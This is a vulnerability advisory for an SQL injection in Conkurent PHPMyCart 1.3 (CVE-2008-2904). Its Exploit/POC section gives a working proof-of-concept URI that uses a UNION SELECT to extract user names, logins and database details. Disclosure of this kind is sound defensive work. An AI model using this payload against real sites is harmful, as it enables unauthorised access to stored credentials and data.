Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
BID:29726
Info
Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
| Bugtraq ID: | 29726 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2904 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 14 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | h0yt3r |
| Vulnerable: |
Conkurent PHPMyCart 1.3 |
| Not Vulnerable: | |
Discussion
Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
PHPMyCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHPMyCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
Solution / Fix
Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: %[email protected].
References
Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability
References:
References:
- PHPMyCart Homepage (Conkurent)